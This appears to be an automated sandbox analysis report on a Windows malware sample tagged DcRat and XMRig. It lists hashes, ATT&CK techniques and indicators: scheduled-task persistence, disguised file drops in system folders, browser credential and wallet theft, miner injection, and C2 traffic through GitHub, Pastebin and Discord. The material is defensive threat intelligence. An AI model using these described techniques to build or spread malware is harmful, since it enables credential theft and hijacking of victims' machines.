dcrat | 7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b

Analysis

max time kernel
53s
max time network
53s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
12-11-2024 18:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LunoLoader_pixelplanet.fun.exe
Size

13.0MB
MD5

99ad27619a24a5a2612cac5c12eec1fb
SHA1

9362cad056c4e368b9e009b2df65bdfecfc885fb
SHA256

7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b
SHA512

708273edcd26d7d68d31f5515a870a02809c40be08e736e2c679440094210644c3a1bbae3bb5655c12b1554c2308aedd30e7cd33fa58459a45d9a3e08246a69b
SSDEEP

393216:nfF3qxQ08kHzQq+Tm4aYnt88rmaeU/3ktYZxyKY:nfF3T08aQqS+S88CJU/wklY

Score

10^/10

dcrat xmrig collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer upx

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 21 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3760	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3608	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	984	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1540	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2896	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	124	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	700	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3720	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1932	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2700	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3432	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3936	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2216	2372	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3752	2372	schtasks.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe	dcrat
C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe	dcrat
behavioral1/memory/2592-165-0x0000000000670000-0x00000000007C0000-memory.dmp	dcrat

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1984-84-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-100-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-102-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-103-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-101-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-98-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1984-85-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

5048 powershell.exe
3716 powershell.exe
2324 powershell.exe
5016 powershell.exe
2804 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

pid	process
5048	powershell.exe
3716	powershell.exe
2324	powershell.exe
5016	powershell.exe
2804	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exess-a2.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ss-a2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
collection

Clipboard Data
T1115

Processes:

cmd.exepowershell.exe

pid process

4636 cmd.exe
4824 powershell.exe
Executes dropped EXE 9 IoCs

Processes:

sigmasoft3.exess.exess-a.exegmstcccpdzbb.exess-a2.exess-a2.exeWinRuntime.exewininit.exerar.exe

pid process

1180 sigmasoft3.exe
2096 ss.exe
2040 ss-a.exe
2844 gmstcccpdzbb.exe
2004 ss-a2.exe
2360 ss-a2.exe
2592 WinRuntime.exe
32 wininit.exe
1100 rar.exe

pid	process
4636	cmd.exe
4824	powershell.exe

pid	process
1180	sigmasoft3.exe
2096	ss.exe
2040	ss-a.exe
2844	gmstcccpdzbb.exe
2004	ss-a2.exe
2360	ss-a2.exe
2592	WinRuntime.exe
32	wininit.exe
1100	rar.exe

Loads dropped DLL 16 IoCs

Processes:

ss-a2.exe

pid	process
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe
2360	ss-a2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

Processes:

flow	ioc
1	raw.githubusercontent.com
9	raw.githubusercontent.com
12	raw.githubusercontent.com
8	raw.githubusercontent.com
11	raw.githubusercontent.com
13	raw.githubusercontent.com
14	raw.githubusercontent.com
22	discord.com
1	pastebin.com
3	discord.com
4	raw.githubusercontent.com
15	pastebin.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com
10	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

2444 powercfg.exe
2124 powercfg.exe
4672 powercfg.exe
3564 powercfg.exe
1672 powercfg.exe
224 powercfg.exe
236 powercfg.exe
804 powercfg.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1504 tasklist.exe
4412 tasklist.exe
2044 tasklist.exe
840 tasklist.exe
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

3776 cmd.exe

flow	ioc
1	ip-api.com

pid	process
2444	powercfg.exe
2124	powercfg.exe
4672	powercfg.exe
3564	powercfg.exe
1672	powercfg.exe
224	powercfg.exe
236	powercfg.exe
804	powercfg.exe

pid	process
1504	tasklist.exe
4412	tasklist.exe
2044	tasklist.exe
840	tasklist.exe

pid	process
3776	cmd.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

gmstcccpdzbb.exe

description	pid	process	target process
PID 2844 set thread context of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 set thread context of 1984	2844	gmstcccpdzbb.exe	conhost.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1984-69-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-70-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-84-0x0000000140000000-0x0000000140848000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\python312.dll	upx
behavioral1/memory/1984-100-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-102-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-103-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/2360-104-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp	upx
behavioral1/memory/1984-101-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-98-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-85-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-83-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-81-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1984-79-0x0000000140000000-0x0000000140848000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_ctypes.pyd	upx
behavioral1/memory/2360-127-0x00007FFFE8E90000-0x00007FFFE8E9F000-memory.dmp	upx
behavioral1/memory/2360-126-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\libssl-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\libcrypto-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI20042\libffi-8.dll	upx
behavioral1/memory/2360-133-0x00007FFFE4D50000-0x00007FFFE4D7D000-memory.dmp	upx
behavioral1/memory/2360-137-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp	upx
behavioral1/memory/2360-135-0x00007FFFE4D30000-0x00007FFFE4D4A000-memory.dmp	upx
behavioral1/memory/2360-141-0x00007FFFE4C90000-0x00007FFFE4CA9000-memory.dmp	upx
behavioral1/memory/2360-143-0x00007FFFE4C80000-0x00007FFFE4C8D000-memory.dmp	upx
behavioral1/memory/2360-147-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp	upx
behavioral1/memory/2360-149-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp	upx
behavioral1/memory/2360-150-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp	upx
behavioral1/memory/2360-148-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp	upx
behavioral1/memory/2360-139-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp	upx
behavioral1/memory/2360-156-0x00007FFFE4C70000-0x00007FFFE4C7D000-memory.dmp	upx
behavioral1/memory/2360-161-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp	upx
behavioral1/memory/2360-153-0x00007FFFE3A60000-0x00007FFFE3A74000-memory.dmp	upx
behavioral1/memory/2360-152-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp	upx
behavioral1/memory/2360-262-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp	upx
behavioral1/memory/2360-285-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp	upx
behavioral1/memory/2360-356-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp	upx
behavioral1/memory/2360-355-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp	upx
behavioral1/memory/2360-354-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp	upx
behavioral1/memory/2360-367-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp	upx
behavioral1/memory/2360-381-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp	upx
behavioral1/memory/2360-447-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp	upx
behavioral1/memory/2360-453-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp	upx
behavioral1/memory/2360-448-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp	upx
behavioral1/memory/2360-504-0x00007FFFE4C90000-0x00007FFFE4CA9000-memory.dmp	upx
behavioral1/memory/2360-502-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp	upx
behavioral1/memory/2360-506-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp	upx
behavioral1/memory/2360-511-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp	upx
behavioral1/memory/2360-510-0x00007FFFE4C70000-0x00007FFFE4C7D000-memory.dmp	upx
behavioral1/memory/2360-509-0x00007FFFE3A60000-0x00007FFFE3A74000-memory.dmp	upx
behavioral1/memory/2360-508-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp	upx
behavioral1/memory/2360-507-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp	upx
behavioral1/memory/2360-505-0x00007FFFE4C80000-0x00007FFFE4C8D000-memory.dmp	upx

Drops file in Program Files directory 7 IoCs

Processes:

WinRuntime.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe	WinRuntime.exe
File created	C:\Program Files (x86)\Windows Media Player\fr-FR\5940a34987c991	WinRuntime.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe	WinRuntime.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\ebf1f9fa8afd6d	WinRuntime.exe
File created	C:\Program Files\Microsoft Office\root\loc\System.exe	WinRuntime.exe
File opened for modification	C:\Program Files\Microsoft Office\root\loc\System.exe	WinRuntime.exe
File created	C:\Program Files\Microsoft Office\root\loc\27d1bcfc3c54e0	WinRuntime.exe

Drops file in Windows directory 3 IoCs

Processes:

WinRuntime.exe

description	ioc	process
File created	C:\Windows\fr-FR\OfficeClickToRun.exe	WinRuntime.exe
File created	C:\Windows\fr-FR\e6c9b481da804f	WinRuntime.exe
File created	C:\Windows\CSC\powershell.exe	WinRuntime.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3004 sc.exe
4916 sc.exe
8 sc.exe
4168 sc.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3004	sc.exe
4916	sc.exe
8	sc.exe
4168	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exess.exeWScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exePING.EXE

pid process

4856 cmd.exe
1616 PING.EXE
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

cmd.exenetsh.exe

pid process

2676 cmd.exe
1112 netsh.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4772 WMIC.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3032 systeminfo.exe

pid	process
4856	cmd.exe
1616	PING.EXE

pid	process
2676	cmd.exe
1112	netsh.exe

pid	process
4772	WMIC.exe

pid	process
3032	systeminfo.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

conhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe

Modifies registry class 3 IoCs

Processes:

ss.exewininit.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	ss.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	wininit.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1616 PING.EXE

pid	process
1616	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
2708	schtasks.exe
8	schtasks.exe
4484	schtasks.exe
2216	schtasks.exe
1804	schtasks.exe
984	schtasks.exe
2700	schtasks.exe
2896	schtasks.exe
2700	schtasks.exe
3432	schtasks.exe
3760	schtasks.exe
3608	schtasks.exe
1540	schtasks.exe
4484	schtasks.exe
700	schtasks.exe
3720	schtasks.exe
5004	schtasks.exe
3752	schtasks.exe
124	schtasks.exe
1932	schtasks.exe
3936	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ss-a.exegmstcccpdzbb.exepowershell.exeWinRuntime.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

pid	process
2040	ss-a.exe
2040	ss-a.exe
2040	ss-a.exe
2040	ss-a.exe
2040	ss-a.exe
2040	ss-a.exe
2040	ss-a.exe
2040	ss-a.exe
2844	gmstcccpdzbb.exe
2844	gmstcccpdzbb.exe
2844	gmstcccpdzbb.exe
2844	gmstcccpdzbb.exe
2844	gmstcccpdzbb.exe
2844	gmstcccpdzbb.exe
5048	powershell.exe
5048	powershell.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
4824	powershell.exe
4824	powershell.exe
2804	powershell.exe
2804	powershell.exe
1984	conhost.exe
1984	conhost.exe
1984	conhost.exe
1984	conhost.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
5048	powershell.exe
5048	powershell.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
5016	powershell.exe
5016	powershell.exe
1984	conhost.exe
1984	conhost.exe
5092	powershell.exe
5092	powershell.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
4824	powershell.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2804	powershell.exe
5092	powershell.exe
1984	conhost.exe
1984	conhost.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
5016	powershell.exe
2592	WinRuntime.exe
2592	WinRuntime.exe
1984	conhost.exe
1984	conhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exeWinRuntime.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exetasklist.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	236	powercfg.exe
Token: SeCreatePagefilePrivilege	236	powercfg.exe
Token: SeShutdownPrivilege	3564	powercfg.exe
Token: SeCreatePagefilePrivilege	3564	powercfg.exe
Token: SeShutdownPrivilege	1672	powercfg.exe
Token: SeCreatePagefilePrivilege	1672	powercfg.exe
Token: SeShutdownPrivilege	224	powercfg.exe
Token: SeCreatePagefilePrivilege	224	powercfg.exe
Token: SeShutdownPrivilege	4672	powercfg.exe
Token: SeCreatePagefilePrivilege	4672	powercfg.exe
Token: SeShutdownPrivilege	2124	powercfg.exe
Token: SeCreatePagefilePrivilege	2124	powercfg.exe
Token: SeLockMemoryPrivilege	1984	conhost.exe
Token: SeShutdownPrivilege	2444	powercfg.exe
Token: SeCreatePagefilePrivilege	2444	powercfg.exe
Token: SeShutdownPrivilege	804	powercfg.exe
Token: SeCreatePagefilePrivilege	804	powercfg.exe
Token: SeDebugPrivilege	2592	WinRuntime.exe
Token: SeDebugPrivilege	1504	tasklist.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	4412	tasklist.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: 36	1620	WMIC.exe
Token: SeDebugPrivilege	2044	tasklist.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

LunoLoader_pixelplanet.fun.exesigmasoft3.exess.exegmstcccpdzbb.exess-a2.exess-a2.exeWScript.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4900 wrote to memory of 1180	4900	LunoLoader_pixelplanet.fun.exe	sigmasoft3.exe
PID 4900 wrote to memory of 1180	4900	LunoLoader_pixelplanet.fun.exe	sigmasoft3.exe
PID 1180 wrote to memory of 2096	1180	sigmasoft3.exe	ss.exe
PID 1180 wrote to memory of 2096	1180	sigmasoft3.exe	ss.exe
PID 1180 wrote to memory of 2096	1180	sigmasoft3.exe	ss.exe
PID 2096 wrote to memory of 3372	2096	ss.exe	WScript.exe
PID 2096 wrote to memory of 3372	2096	ss.exe	WScript.exe
PID 2096 wrote to memory of 3372	2096	ss.exe	WScript.exe
PID 1180 wrote to memory of 2040	1180	sigmasoft3.exe	ss-a.exe
PID 1180 wrote to memory of 2040	1180	sigmasoft3.exe	ss-a.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 1180 wrote to memory of 2004	1180	sigmasoft3.exe	ss-a2.exe
PID 1180 wrote to memory of 2004	1180	sigmasoft3.exe	ss-a2.exe
PID 2844 wrote to memory of 1392	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1984	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1984	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1984	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1984	2844	gmstcccpdzbb.exe	conhost.exe
PID 2844 wrote to memory of 1984	2844	gmstcccpdzbb.exe	conhost.exe
PID 2004 wrote to memory of 2360	2004	ss-a2.exe	ss-a2.exe
PID 2004 wrote to memory of 2360	2004	ss-a2.exe	ss-a2.exe
PID 2360 wrote to memory of 2292	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 2292	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 4180	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 4180	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 3776	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 3776	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 436	2360	ss-a2.exe	cmd.exe
PID 2360 wrote to memory of 436	2360	ss-a2.exe	cmd.exe
PID 3372 wrote to memory of 2564	3372	WScript.exe	cmd.exe
PID 3372 wrote to memory of 2564	3372	WScript.exe	cmd.exe
PID 3372 wrote to memory of 2564	3372	WScript.exe	cmd.exe
